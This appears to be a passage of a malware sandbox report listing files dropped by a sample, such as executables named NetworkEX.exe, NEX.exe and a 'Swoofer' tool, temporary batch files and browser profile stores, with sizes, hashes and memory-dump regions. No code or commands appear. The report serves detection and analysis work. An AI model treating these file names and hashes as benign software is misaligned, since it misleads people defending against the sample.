Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
51a14a0ac549862c266f5e968999daec

SHA1
7de1b3e45bface945e18ac54d6fdf72fca0c3f66

SHA256
ed0358731e388bf3ea5a1c930c05fb6f293c76e89d1eafd8e2bd72018c16a48e

SHA512
a164dbf126fba84de28e771289743b3fdc5c254378b3e9a876fd82edf84caedb1227dc27ef6f24a36b0e403cf2af711f6e7965ebfaede3593259ac111203bd80

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
1b34c218a669f4281cc159afef1222b4

SHA1
a32bfc3870096c8b5c351d58ccc08f6400c39238

SHA256
3d75e186986f8463c3e9edc4e4df97e7292276d32d9eb64c3ebf60bac4bd5ede

SHA512
b209735b6343091a6d934b90d10cab7c41e465595ffa54d28cdc3050ee1972a647f4040242a9bb34c9b1de88b5cbf4c2ab80907776ce4ea59d547a678993e720

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
7eb4e058795aaf02e9e161eb5d5e3689

SHA1
aeaedbcadbc7b39f0016113bc252fe2faa5ed7b7

SHA256
e63490ad7aadfe933139b4ed59694ee60928fc9c2ca56e89f05218d99d8e2ce8

SHA512
d226dd70a46ff7e93cee23efcdbd4665b631af6bff1db253538a672248ea853fc3065e06b623f55eceba46fc4f6421fe076a2f1b003cd4007e2f1e23b5475fa9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
eb033be02578f9635ec47bdc1de5c3fb

SHA1
ec356bc87381354a06baa9c30e8c3ac3d30e0f6f

SHA256
bd827af3192bf83c75a32e51ed2de83bd3b90d6b99350721a189a57cec15d063

SHA512
4d8778503646f7016df73ff9d204760f4fe4d2b24157920ac3e5651653373975b2f2d229530143059f11b16c42822ad7963e628ad6066022ee712c17d90595ed

Download Submit
C:\Users\Admin\AppData\Local\NEX.exe

Filesize
46KB

MD5
49592068de00ac0b55980502a7a78a18

SHA1
43237168c7d0170076c466f9a738e0c30dbceb16

SHA256
08966125b28e88837732b990977124b7ab7393474cc10770375370af3801a898

SHA512
6340d949dcd79be953a8781f764e63154b63fb3f24e316c0e6b81fa9ec773c9087a529e8cef90d4ec3ad8f611855b298cefbc85b608ea32a014ceaaabd128f78

Download Submit
C:\Users\Admin\AppData\Local\Temp\AccuracyFN Swoofer.exe

Filesize
19KB

MD5
d9f380de63eb79d069848b7fa8093e19

SHA1
f06585fc7d08dc67c1cb6171415a33ffb8683189

SHA256
b6cb8289496b89de66a1d22897053403acc3b6f88aa64e20b975a42bf937ce34

SHA512
794616dd385dedf61c8ec93dcefb358f1f0b778ccb62588557b8be2ca59d555dced9738af1f0d1045557fb4a7a127e071cca525dea4ad630f5dfe25889a32ed5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Koks_Cleaner.exe

Filesize
217KB

MD5
22bd165c9c2a38257ff23687d9ae0774

SHA1
1a84ddbb284e3e6d95f78371c6c92a1d32ae1271

SHA256
3decb581b456e36db05f7a9ffbc8b1c14964d059ffd6fad6d99b42a1b7dd9bb9

SHA512
fa0a8307fbbc7ed1d49f5612bd05acdfe4aea5a5222dd65b13a5b3b457f1d3865bf794b8bf484c693d6553fc52cd8d5a91c96129fb367f7eb930c223f49678f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\NXT Cleaner.exe

Filesize
3.2MB

MD5
644399a0aff07bd4f7dc1eb5aa5c0236

SHA1
243f1f7bb95af8d3c44a270772f408c6febb06af

SHA256
5d101b2efae1e9390ac98e014a05d54338ec45cd73ff5dd70842877910f7b758

SHA512
73db539182c67d18b4e491966672876054cdeaae9d5ac024f1991a0551aea74867d9f1df7487655a5c9089553b967c09f558b02e33ec0cc015b6587fd5eb2508

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xmjp5msz.zh1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nExOs.exe

Filesize
1.6MB

MD5
23e4c238bcb922264e053daddc9386f9

SHA1
096327749ff3f913c67785b8110ec5ada1f414ee

SHA256
775d7e68654c70a764f72629812eda2b73520eeac12efb42d60efda16d8225a0

SHA512
34c59ab73aa231b224ea1a2b62f3a4956f8a556acb7abc2f4c1e3e1a9939b3bd49a378d0649d2a541b1cbc763b7bd5187e977d8eb94115603217bc6d7c93aebe

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp734B.tmp.bat

Filesize
153B

MD5
826c8195d90f92ec8b73e772496c5974

SHA1
551b04a0bf482481ba2c651d936f35a823f2f934

SHA256
4db4d00288ea6030882cac12f4914e3a6ef0598d024904d423db6aa22b64f471

SHA512
0e63715a0cfa3cd9c79e55174155f5d82caefcb23524fdf95de55224fa7a5b00249958c963a886ccf995fd1239a3c746ea84a154a2f060f1e827572ab761849f

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp78E9.tmp.bat

Filesize
153B

MD5
364e7fcc4366c127317b74fdb2828595

SHA1
655c489dc6f301f1d3aa8594bc256e61b8f15e79

SHA256
9a36a50cda4d4c9a4d6bac80d1fb888e1331c3a3a3c967fb9aa56f6b1f404af8

SHA512
461ad2ea512e8448a9c0ead318154928cd381012824cb51537b0cfd866bb6e9e9ec691270ca39757f19adff9b542e3c4319d3fc1e49bae2395070a64add30872

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\PERTHE563456HGRSEG674RSGE\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm

Filesize
32KB

MD5
b7c14ec6110fa820ca6b65f5aec85911

SHA1
608eeb7488042453c9ca40f7e1398fc1a270f3f4

SHA256
fd4c9fda9cd3f9ae7c962b0ddf37232294d55580e1aa165aa06129b8549389eb

SHA512
d8d75760f29b1e27ac9430bc4f4ffcec39f1590be5aef2bfb5a535850302e067c288ef59cf3b2c5751009a22a6957733f9f80fa18f2b0d33d90c068a3f08f3b0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\PERTHE563456HGRSEG674RSGE\storage\permanent\chrome\idb\3561288849sdhlie.sqlite

Filesize
48KB

MD5
134986f96505a571c0edefaf1ef085f2

SHA1
fddd38b120d94690c6b6912e5192512c86e320a0

SHA256
d4544add7ba18f90f39e10c7a3fd650e7c7f4067b01650826fffe9838d2fb50d

SHA512
8657831b42fe6ec3204258157e99c5e193ab7e86e72258f8a036ea9cd282b87de43f379155db28e30be9a86151709ea99f58657138752c6c4728eefa866b6ca9

Download Submit
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

Filesize
8B

MD5
cf759e4c5f14fe3eec41b87ed756cea8

SHA1
c27c796bb3c2fac929359563676f4ba1ffada1f5

SHA256
c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

SHA512
c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

Download Submit
C:\Users\Admin\AppData\Roaming\Network Experience.exe

Filesize
74KB

MD5
912eae8fe9cd4fbce5bc1973d260ac7c

SHA1
c5ef553fbaa201df4b8ab28ce07053eb92e5e225

SHA256
fcc7fb6cb01904fcd07c1a32bf28913e8793219f8536d188b28a3e1659d094a4

SHA512
e8640b818286cfbefdc4b62d79e37138b57580de9c1d9d89858552837ba09f1fcbe8979c96f23c981634716e1280ec33ee7d4be57e5d809b50cf06467803a21b

Download Submit
C:\Users\Admin\NetworkEX.exe

Filesize
585KB

MD5
5350dbd4a054948b6b6f9d9a1e38d4d5

SHA1
cfc57fe0f9e489364bd4d51aaf8f963340267fdb

SHA256
c4e16cd490dfad21cb9b352e3c7c03d99fc5f38cf20ae7cb595d00b082844bdb

SHA512
74d5159cb923d3b416a0c5f82d737e13e14423e43b020a9601a664b1880b579ca7132cc35b0c7a38a072baa633e5fb0495456b4a2b62a5181a179a46421ed9db

Download Submit
C:\Windows\Network.exe

Filesize
91KB

MD5
e14da59f36f995b0a212775074e25ce7

SHA1
574ba408726a83ec63a37782cc4e0cf2f009dabd

SHA256
19fcfef4db315e0d0a65bb7f13b35503559a00f2fb83298449fd719075f32c45

SHA512
6db0b5a34ca9e9e234b841cfb44bc5b5e9c3fea2585634702b8bfcf44af947e48b5c2ac4ec8d532b84b0c7c6aec6ea1b1155f5a75b7fdbe363b1eb2370c63b21

Download Submit
C:\Windows\NetworkEX.exe

Filesize
803KB

MD5
69c2b301ae1b996bc8d50589992df9cd

SHA1
f3e8ddb6351faf2e3556f4b255441be0b1aecd77

SHA256
ac15826ff25a52272687a23bf93194ff27267ab6893ad569afbfa6d2df426b76

SHA512
73e21e1c0ce97c936f02106db593a957fae4129e4746fe9a0b8bea8b5dd407af5cf12b4873ed55bd3e472d16f5e16c54498d9d48546560e719eec51b557bffe9

Download Submit
memory/8-148-0x0000000005DB0000-0x0000000005DCE000-memory.dmp

Filesize
120KB

Download
memory/8-485-0x0000000006D50000-0x0000000006D82000-memory.dmp

Filesize
200KB

Download
memory/8-675-0x0000000007380000-0x0000000007388000-memory.dmp

Filesize
32KB

Download
memory/8-674-0x0000000007430000-0x000000000744A000-memory.dmp

Filesize
104KB

Download
memory/8-126-0x0000000005630000-0x0000000005652000-memory.dmp

Filesize
136KB

Download
memory/8-672-0x0000000007340000-0x000000000734E000-memory.dmp

Filesize
56KB

Download
memory/8-671-0x0000000007300000-0x0000000007311000-memory.dmp

Filesize
68KB

Download
memory/8-669-0x0000000007390000-0x0000000007426000-memory.dmp

Filesize
600KB

Download
memory/8-668-0x0000000007170000-0x000000000717A000-memory.dmp

Filesize
40KB

Download
memory/8-149-0x0000000005DE0000-0x0000000005E2C000-memory.dmp

Filesize
304KB

Download
memory/8-661-0x0000000007730000-0x0000000007DAA000-memory.dmp

Filesize
6.5MB

Download
memory/8-528-0x0000000006FB0000-0x0000000007053000-memory.dmp

Filesize
652KB

Download
memory/8-495-0x00000000747A0000-0x00000000747EC000-memory.dmp

Filesize
304KB

Download
memory/8-521-0x0000000006D90000-0x0000000006DAE000-memory.dmp

Filesize
120KB

Download
memory/836-108-0x0000000000790000-0x00000000007A8000-memory.dmp

Filesize
96KB

Download
memory/2756-116-0x0000000000660000-0x000000000067E000-memory.dmp

Filesize
120KB

Download
memory/2964-111-0x0000000000AF0000-0x0000000000B00000-memory.dmp

Filesize
64KB

Download
memory/3392-686-0x0000023D9CB10000-0x0000023D9CB32000-memory.dmp

Filesize
136KB

Download
memory/3488-128-0x00000000054B0000-0x0000000005516000-memory.dmp

Filesize
408KB

Download
memory/3488-127-0x0000000005440000-0x00000000054A6000-memory.dmp

Filesize
408KB

Download
memory/3488-673-0x00000000070A0000-0x00000000070B4000-memory.dmp

Filesize
80KB

Download
memory/3488-113-0x0000000004CA0000-0x00000000052C8000-memory.dmp

Filesize
6.2MB

Download
memory/3488-531-0x00000000747A0000-0x00000000747EC000-memory.dmp

Filesize
304KB

Download
memory/3488-139-0x0000000005520000-0x0000000005874000-memory.dmp

Filesize
3.3MB

Download
memory/3488-662-0x0000000006E50000-0x0000000006E6A000-memory.dmp

Filesize
104KB

Download
memory/3488-106-0x0000000000D80000-0x0000000000DB6000-memory.dmp

Filesize
216KB

Download
memory/3488-35-0x0000000073ECE000-0x0000000073ECF000-memory.dmp

Filesize
4KB

Download
memory/4228-117-0x0000000000370000-0x0000000000408000-memory.dmp

Filesize
608KB

Download
memory/4564-123-0x0000000140000000-0x0000000140567000-memory.dmp

Filesize
5.4MB

Download
memory/5580-1323-0x00000273D8A90000-0x00000273D8ABA000-memory.dmp

Filesize
168KB

Download
memory/5580-1324-0x00000273D8A90000-0x00000273D8AB4000-memory.dmp

Filesize
144KB

Download